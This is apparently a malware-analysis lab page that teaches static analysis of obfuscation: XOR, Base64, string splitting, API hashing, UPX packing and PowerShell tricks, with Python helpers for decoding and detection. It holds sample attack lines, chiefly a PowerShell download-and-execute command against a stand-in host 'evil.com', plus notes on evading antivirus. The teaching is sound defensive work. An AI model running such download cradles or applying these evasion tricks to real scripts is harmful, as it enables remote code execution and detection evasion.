>_ Malware Analysis Lab

PRACIVO LAB — SAFE SAMPLES ONLY
⚠️ Pracivo Security Lab — All samples are COMPLETELY SAFE text files. No real malware. For learning static analysis techniques only.

> Obfuscation Techniques

# Malware uses obfuscation to hide strings, imports and behaviour from signature-based antivirus and from analysts doing static analysis

# TECHNIQUE 1: XOR Encoding
# Original string: "cmd.exe"
# XOR each byte with key 0x5A gives 39 37 3E 74 3F 22 3F (prints as 97>t?"?)
# XOR is its own inverse: applying the same key again restores the plaintext
# Python to decode:
key = 0x5A
encoded = [0x39, 0x37, 0x3E, 0x74, 0x3F, 0x22, 0x3F]
decoded = "".join(chr(b ^ key) for b in encoded)
print(decoded)  # cmd.exe
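Real samples rarely hand you the key. The following is an added example (not part of the Pracivo lab) that generalises the decode above: it brute-forces an unknown single-byte XOR key by trying all 256 candidates and scoring each decode. The sample bytes are constructed here by XORing "cmd.exe /c whoami" with 0x5A; the scoring heuristic is an assumption, tuned for command lines and paths.

```python
import string
from typing import Tuple

PRINTABLE = set(string.printable.encode())
LOWER_OR_SPACE = set(string.ascii_lowercase.encode()) | {0x20}


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


def score_plaintext(data: bytes) -> float:
    """0..2: share of printable ASCII plus share of lowercase letters/spaces.

    A plain "is it printable" check is not enough: printable text XORed with a
    printable key is itself printable, so key 0x00 would tie with the real key.
    Command lines, URLs and paths are mostly lowercase, which breaks the tie.
    """
    if not data:
        return 0.0
    printable = sum(1 for b in data if b in PRINTABLE) / len(data)
    lower = sum(1 for b in data if b in LOWER_OR_SPACE) / len(data)
    return printable + lower


def recover_xor_key(encoded: bytes, hint: bytes = b"") -> Tuple[int, bytes]:
    """Try all 256 single-byte keys and return (key, plaintext) for the best score.

    A known plaintext fragment (hint), e.g. b".exe", outranks the statistics.
    """
    best_score, best = -1.0, (0, b"")
    for key in range(256):
        cand = xor_bytes(encoded, key)
        score = score_plaintext(cand) + (1.0 if hint and hint in cand else 0.0)
        if score > best_score:
            best_score, best = score, (key, cand)
    return best


# Constructed sample: a command line XORed with 0x5A, as a dropper might store it.
SAMPLE = xor_bytes(b"cmd.exe /c whoami", 0x5A)

if __name__ == "__main__":
    key, plain = recover_xor_key(SAMPLE)
    print(f"key=0x{key:02X} plaintext={plain!r}")
```

Multi-byte (repeating) keys need a different approach: guess the key length first, then treat every key position as its own single-byte problem and run this same scoring on each slice.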

# TECHNIQUE 2: Base64
import base64
encoded = "aHR0cDovL2V2aWwuY29tL3BheWxvYWQ="
print(base64.b64decode(encoded).decode())  # http://evil.com/payload

# TECHNIQUE 3: String splitting (evades a simple substring signature)
# Instead of: "powershell"
# Malware uses: "power" + "shell"
# The full keyword never appears in the file; it only exists after the concatenation runs

# TECHNIQUE 4: API hashing
# Instead of importing "CreateRemoteThread" by name,
# malware stores a hash of the name, walks the export table of the DLL at runtime,
# hashes every export name and calls the one whose hash matches
# This hides the import from static analysis: no import table entry, no string
# Analyst counter: precompute the hash of every export of common DLLs and look the constants up
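As an added example (not part of the Pracivo lab), here is a ROR13-style API hash of the kind position-independent shellcode uses in place of an import table, together with the reverse lookup an analyst performs to map a constant found in disassembly back to an export name. The rotate count of 13, ASCII-only input and the short export list are assumptions; real samples vary the constant and often mix the module name into the hash.

```python
from typing import Dict, Iterable, Optional


def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits (count in 0..31)."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """hash = ror(hash, 13) + byte for each byte of the export name, mod 2**32.

    This is the shape of the classic shellcode hash; the malware ships only the
    32-bit result, never the string "CreateRemoteThread".
    """
    h = 0
    for b in name.encode("ascii"):
        h = (ror32(h, 13) + b) & 0xFFFFFFFF
    return h


# Constructed stand-in for the export table of kernel32.dll. A real triage script
# would pull every export name from the DLL with a PE parser instead.
KERNEL32_EXPORTS = [
    "CreateRemoteThread", "CreateThread", "VirtualAlloc", "VirtualAllocEx",
    "WriteProcessMemory", "LoadLibraryA", "GetProcAddress", "OpenProcess",
]


def build_hash_table(exports: Iterable[str]) -> Dict[int, str]:
    """Precompute hash -> name so unknown constants resolve with one dict lookup."""
    return {ror13_hash(name): name for name in exports}


def resolve_api_hash(h: int, table: Dict[int, str]) -> Optional[str]:
    """Map a constant seen in the sample (e.g. the operand of a push) to an API name."""
    return table.get(h & 0xFFFFFFFF)


if __name__ == "__main__":
    table = build_hash_table(KERNEL32_EXPORTS)
    unknown = ror13_hash("CreateRemoteThread")  # what the sample would embed
    print(f"0x{unknown:08X} -> {resolve_api_hash(unknown, table)}")
```

When the lookup finds nothing, the sample is probably using a different rotate count or a different algorithm (CRC32, FNV-1a, DJB2 are common); the resolver loop in the disassembly tells you which, and only the hash function needs swapping.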

# TECHNIQUE 5: Packed executables (UPX)
# Compress the original binary (custom packers also encrypt it)
# A small stub decompresses it into memory at runtime,
# so the real code and strings are not visible on disk
# Detect: high entropy, tiny import table (often just LoadLibraryA/GetProcAddress),
# section names UPX0/UPX1 and the "UPX!" marker

# Detect UPX packing:
strings malware.exe | grep -i upx
# Unpack (stock UPX only; a sample with modified UPX headers must be dumped from memory instead):
upx -d malware.exe
# Add "-o unpacked.exe" to keep the packed original for comparison
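The "high entropy" heuristic above, as an added example (not part of the Pracivo lab): Shannon entropy of a byte buffer tops out at 8 bits per byte; compressed or encrypted sections sit close to that, while code and text sit well below. Both buffers here are constructed (a repeated string of PE-style text stands in for .text, seeded pseudo-random bytes for a packed section), so nothing is read from disk; the 7.2 threshold is an assumption.

```python
import math
import random
from collections import Counter
from typing import Dict, Tuple


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: -sum(p * log2 p) over the byte-value histogram."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(data: bytes, threshold: float = 7.2) -> bool:
    """Heuristic only: legitimately compressed resources score high too."""
    return shannon_entropy(data) >= threshold


def section_report(sections: Dict[str, bytes]) -> Dict[str, Tuple[float, bool]]:
    """name -> (entropy, packed?) per section, the way a PE triage script reports it."""
    return {name: (round(shannon_entropy(blob), 2), looks_packed(blob))
            for name, blob in sections.items()}


# Constructed stand-ins for section contents.
PLAIN_SECTION = (b"This program cannot be run in DOS mode.\r\n"
                 b"kernel32.dll CreateRemoteThread WriteProcessMemory\x00") * 40
_rng = random.Random(1337)  # seeded so the result is reproducible
PACKED_SECTION = bytes(_rng.getrandbits(8) for _ in range(4096))

if __name__ == "__main__":
    for name, (ent, packed) in section_report(
            {".text": PLAIN_SECTION, "UPX1": PACKED_SECTION}).items():
        print(f"{name:6} entropy={ent:.2f} packed={packed}")
```

Run it per section rather than over the whole file: a packed binary still has a low-entropy header and stub, and averaging them in hides the signal.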

# TECHNIQUE 6: PowerShell obfuscation
# Obfuscated: &('I'+'EX') (N`EW`-OBJ`ECT Net.WebClient).DownloadString('http://evil.com')
# Deobfuscated: IEX (New-Object Net.WebClient).DownloadString('http://evil.com')
# Three tricks stacked: the backtick is PowerShell's escape character and is ignored
# in a command name, & is the call operator (runs a string as a command), and IEX is
# the alias of Invoke-Expression. Normalise before matching signatures.
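A first-pass normaliser for the two tricks shown in techniques 3 and 6 (string splitting and backtick/call-operator obfuscation), as an added example that is not part of the Pracivo lab. It is deliberately regex-based rather than a real PowerShell parser, so its limits are visible: it joins only adjacent single-quoted literals, and it keeps backticks that are real escapes (`n, `t, `r, `0). The sample lines and the signature list are constructed for the example.

```python
import re
from typing import List

# Constructed signature list; a real one would be much longer.
SUSPICIOUS = ["IEX", "Invoke-Expression", "New-Object", "DownloadString", "powershell"]

_CONCAT = re.compile(r"'([^']*)'(?:\s*\+\s*'([^']*)')+")
_CALL_OP = re.compile(r"&\s*\(?'([A-Za-z][\w-]*)'\)?")


def strip_backticks(script: str) -> str:
    """Drop backticks used as no-op escapes (N`ew-Object), keep genuine escapes.

    Limitation: a backtick before n/t/r/0 is kept even when it is inside a command
    name, so `N`ew-Object` is handled but `Ne`w-Object` would also pass through.
    """
    return re.sub(r"`(?![ntr0`])", "", script)


def join_concats(script: str) -> str:
    """Collapse 'a'+'b'+'c' into 'abc' so split keywords become whole again."""
    def repl(m: "re.Match") -> str:
        return "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'"
    return _CONCAT.sub(repl, script)


def expand_call_operator(script: str) -> str:
    """&('IEX') or &'IEX' -> IEX once the command name is a single literal."""
    return _CALL_OP.sub(r"\1", script)


def deobfuscate(script: str) -> str:
    """Order matters: join literals only after the backticks are gone."""
    return expand_call_operator(join_concats(strip_backticks(script)))


def match_signatures(script: str) -> List[str]:
    """Case-insensitive substring match, like the simplest AV/EDR string rule."""
    lowered = script.lower()
    return [s for s in SUSPICIOUS if s.lower() in lowered]


# Constructed samples: the lab's obfuscated line and a split keyword.
SAMPLE = "&('I'+'EX') (N`EW`-OBJ`ECT Net.WebClient).DownloadString('http://evil.com')"
SPLIT = "$cmd = 'power' + 'shell'"

if __name__ == "__main__":
    for s in (SAMPLE, SPLIT):
        print("raw      :", match_signatures(s))
        print("normalised:", deobfuscate(s), match_signatures(deobfuscate(s)))
```

On the raw line only DownloadString matches; after normalisation IEX and New-Object surface as well, which is the whole point of the attacker's layering. Anything this normaliser cannot unwrap (format-string tricks, -EncodedCommand, Invoke-Obfuscation's compressed stages) is a cue to move to dynamic analysis or PowerShell script-block logging.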